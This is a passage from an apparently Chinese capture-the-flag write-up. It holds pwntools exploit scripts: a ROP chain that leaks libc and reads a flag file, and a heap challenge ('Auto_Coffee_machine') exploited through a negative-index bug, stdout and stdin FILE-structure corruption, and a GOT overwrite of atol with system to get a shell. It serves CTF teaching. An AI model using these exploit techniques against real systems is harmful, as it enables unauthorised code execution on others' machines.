    sleep(0.1)
    
    # Terminate the pending read. NOTE(review): the original comment said
    # "a null byte", but '0' is the ASCII digit 0x30, not a NUL.
    p.send('0')
    sleep(0.1)
    try:
        # libc base: take the 6 low bytes of the leaked pointer (read up to the
        # first 0x7f byte) and subtract alarm's offset.
        libc_base = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00')) - libc.symbols['alarm']
        log.info(f'libc_base: {hex(libc_base)}')
        # Gadget and function offsets; hard-coded for the libc loaded above.
        pop_rdx = libc_base + 0x1B96
        open_addr = libc_base + 0x10FBF0
        write_addr = libc_base + 0x1100F0
        read_addr = libc_base + 0x110020
        flag = 0x601118
        # open("flag") / read(3, buf, 0x30) / write(1, buf, 0x30); the file
        # name is appended to the chain and, per the address above, is expected
        # to land at 0x601118 - confirm against the pivoted layout.
        payload = p64(pop_rdi) + p64(flag) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(open_addr)
        payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
        payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
        payload += b"flag\x00\x00\x00"
        sleep(0.1)
        p.sendline(payload)
        p.interactive()
    # NOTE(review): a bare except also swallows KeyboardInterrupt/SystemExit;
    # `except Exception:` would be the narrower choice.
    except:
        print('出错了')
        p.close()
        return
# Retry until the partial overwrite lands: start() closes the tube and returns
# on failure, so each iteration is one more connection; on success it blocks
# in p.interactive() and the loop never continues.
while True:
    p = remote("172.10.0.8", 9999)
    start(p)

# Pwn-Auto_Coffee_machine

image-20231104183242342

本题是一个菜单堆题,存在 UAF 漏洞,可以打 tcache bin attack,也可以打一个非预期,索引为负的漏洞,打 stdout 结构体,io leak 泄露 libc,再打一个 stdin 结构体 任意地址写,修改 atol 的 got 表为 system,最后手写一个 sh 即可

from tools import *
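context.log_level='debug'
# load() and recv_libc() come from the local `tools` helper (not shown);
# presumably load() returns the tube, the ELF and the libc - confirm in tools.py.
p,e,libc=load('pwn',"172.10.0.9:8888")
p.sendlineafter(">>>",str(4421))
# The two little-endian qwords spell the admin password "just pwn it".
payload=p64(0x6e7770207473756a)+p64(0x746920)
p.sendafter("please input the admin password\n",payload)
# Negative index (-45): the out-of-bounds access the write-up describes, used
# first on the stdout FILE structure to make the next output leak a libc pointer.
p.sendlineafter(">>>",str(2))
p.sendlineafter(">>>",str(3))
p.sendlineafter(">>>",str(-107-14+76))
payload=p64(0xfbad1887)+p64(0)*3+b'\x00'
p.send(payload)
# 0x1ec980 is the offset of the leaked pointer in this particular libc build.
libc_base=recv_libc()-0x1ec980
# Same primitive two slots further (-43) on the stdin FILE structure: its
# buffer is pointed at 0x406068..0x406070 so the next input is written there
# (the write-up says this is atol's GOT entry).
p.sendlineafter(">>>",str(2))
p.sendlineafter(">>>",str(3))
p.sendlineafter(">>>",str(-107-14+76+2))
payload=p64(0xfbad1800)+p64(0)*6+p64(0x406068)+p64(0x406070)+b'\x00'
p.send(payload)
# Fixed: this line carried a stray leading space, which is an IndentationError.
p.sendlineafter('>>>',str(3))
p.sendlineafter(">>>",str(1))
p.sendlineafter("input the id of what coffee you want to buy\n",str(1))
p.sendafter("Do you want to add something?Y/N\n",'Y')
# Redirected input: the address of system() replaces the GOT entry, then the
# next call on the string "sh" reaches system instead.
sys_addr=libc_base+libc.symbols['system']
p.send(p64(sys_addr))
p.sendline("sh\x00")
p.interactive()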

image-20231104183946898